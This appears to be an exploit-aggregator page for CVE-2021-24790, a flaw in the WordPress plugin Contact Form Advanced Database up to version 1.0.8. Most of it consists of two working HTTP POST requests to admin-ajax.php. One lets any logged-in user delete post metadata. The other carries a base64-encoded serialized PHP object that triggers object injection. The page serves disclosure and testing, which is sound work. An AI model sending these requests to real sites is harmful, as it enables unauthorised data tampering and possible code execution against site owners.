Exploit for Contact Form Advanced Database <= 1.0.8 - Unauthorised AJAX Calls CVE-2021-24790

Name: Exploit for Contact Form Advanced Database <= 1.0.8 - Unauthorised AJAX Calls CVE-2021-24790
Rating: 5 (98 reviews)

2021-11-15 | CVSS 4.0

## https://sploitus.com/exploit?id=WPEX-ID:ADC5DD9B-0781-4CEA-8CC5-2C10AC35B968
To delete the _edit_lock metadata of the post ID 18:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 77
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data%5b0%5d%5bid%5d=18&data%5b0%5d%5bkey%5d=_edit_lock


To prove the object injection, we inserted a new class in the plugin file:

# class InjectionPoint{public function __destruct(){die("OBJECT INJECTION");}}

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data[0][id]=1data[0][key]=test&data[0][val]=TzoxNDoiSW5qZWN0aW9uUG9pbnQiOjA6e30=